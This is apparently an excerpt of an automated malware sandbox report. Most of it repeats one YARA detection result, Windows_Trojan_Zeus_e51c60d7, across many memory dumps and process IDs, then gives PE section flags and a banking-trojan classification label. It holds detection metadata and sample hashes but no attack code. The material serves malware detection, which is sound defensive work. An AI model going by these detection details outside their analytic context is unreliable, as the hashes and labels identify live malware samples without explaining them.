Source: 00000002.00000003.1951729466.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000008.00000002.1844960712.0000000001510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1727160280.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000005.00000002.1860005149.00000000011C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1989210596.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1953838270.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001C.00000002.2003048692.0000000002AA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1952570956.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1987381593.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000024.00000002.2019868965.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001C.00000002.1961721864.0000000002700000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1833788305.000000000E440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1990556597.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1990141474.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1908832402.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001F.00000002.1989491611.00000000028D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1951475762.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1785353535.000000000E040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2613697268.00000000026A3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000013.00000002.1817738450.0000000002550000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001A.00000002.1912799660.0000000000620000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1992609044.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1986892750.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001F.00000002.2028413256.0000000002AD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: uavINoSIQh.exe PID: 7384, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: svchost.exe PID: 7444, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 4084, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 2604, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 6304, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 4628, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 6964, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 5632, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 2772, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 2936, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 1756, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 1812, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 1900, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 5612, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 3964, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: uavINoSIQh.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine, Classification label: mal100.bank.troj.spyw.expl.evad.winEXE@10/50@2167/24
